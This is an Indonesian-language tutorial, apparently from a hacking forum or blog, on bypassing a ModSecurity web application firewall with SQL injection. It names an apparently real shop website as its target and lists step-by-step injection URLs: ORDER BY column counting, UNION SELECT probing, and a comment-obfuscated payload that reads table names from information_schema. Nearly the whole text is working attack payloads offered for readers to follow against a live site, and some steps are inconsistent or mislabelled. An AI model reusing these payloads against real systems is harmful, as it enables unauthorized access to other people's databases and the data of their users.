Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) , nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :
1. Contoh target
http://www.harshstones.com/product-detail.php?id=35
2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "
http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 13-- ErrorBerarti jumlah table databasenya adalah 12
3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya
http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--
4. Sekarang kita bypass dengan perintah :
/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
5. Sekarang kita coba dengan site diatas :
http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--
Sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum IDCA.
0 komentar